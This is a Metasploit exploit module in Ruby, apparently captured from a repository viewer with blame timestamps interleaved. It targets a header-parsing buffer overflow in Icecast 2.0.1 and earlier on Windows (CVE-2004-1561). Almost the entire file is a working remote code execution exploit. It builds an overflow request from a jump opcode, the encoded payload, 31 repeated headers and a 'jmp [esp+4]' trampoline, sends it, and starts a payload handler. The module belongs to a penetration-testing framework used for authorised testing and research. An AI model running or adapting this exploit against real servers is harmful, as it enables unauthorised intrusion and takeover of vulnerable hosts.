metasploit-framework/modules/exploits/windows/http/icecast_header.rb

92 lines
2.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = GreatRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
2014-03-11 17:44:34 +00:00
'Name' => 'Icecast Header Overwrite',
2013-08-30 21:28:54 +00:00
'Description' => %q{
2014-03-11 17:44:34 +00:00
This module exploits a buffer overflow in the header parsing of icecast
versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32
HTTP headers will cause a write one past the end of a pointer array. On
win32 this happens to overwrite the saved instruction pointer, and on
linux (depending on compiler, etc) this seems to generally overwrite
nothing crucial (read not exploitable).
2014-03-11 17:44:34 +00:00
This exploit uses ExitThread(), this will leave icecast thinking the
thread is still in use, and the thread counter won't be decremented.
This means for each time your payload exits, the counter will be left
incremented, and eventually the threadpool limit will be maxed. So you
can multihit, but only till you fill the threadpool.
2013-08-30 21:28:54 +00:00
},
'Author' => [ 'spoonm', 'Luigi Auriemma <aluigi[at]autistici.org>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2004-1561'],
[ 'OSVDB', '10406'],
[ 'BID', '11271'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x0d\x0a\x00",
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Sep 28 2004',
'DefaultTarget' => 0))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(8000)
], self.class)
end
2013-08-30 21:28:54 +00:00
# Interesting that ebp is pushed after the local variables, and the line array
# is right before the saved eip, so overrunning it just by 1 element overwrites
# eip, making an interesting exploit....
# .text:00414C00 sub esp, 94h
# .text:00414C06 push ebx
# .text:00414C07 push ebp
# .text:00414C08 push esi
2013-08-30 21:28:54 +00:00
def exploit
connect
2013-08-30 21:28:54 +00:00
# bounce bounce bouncey bounce.. (our chunk gets free'd, so do a little dance)
# jmp 12
evul = "\xeb\x0c / HTTP/1.1 #{payload.encoded}\r\n"
evul << "Accept: text/html\r\n" * 31;
2013-08-30 21:28:54 +00:00
# jmp [esp+4]
evul << "\xff\x64\x24\x04\r\n"
evul << "\r\n"
2013-08-30 21:28:54 +00:00
sock.put(evul)
2013-08-30 21:28:54 +00:00
handler
disconnect
end
end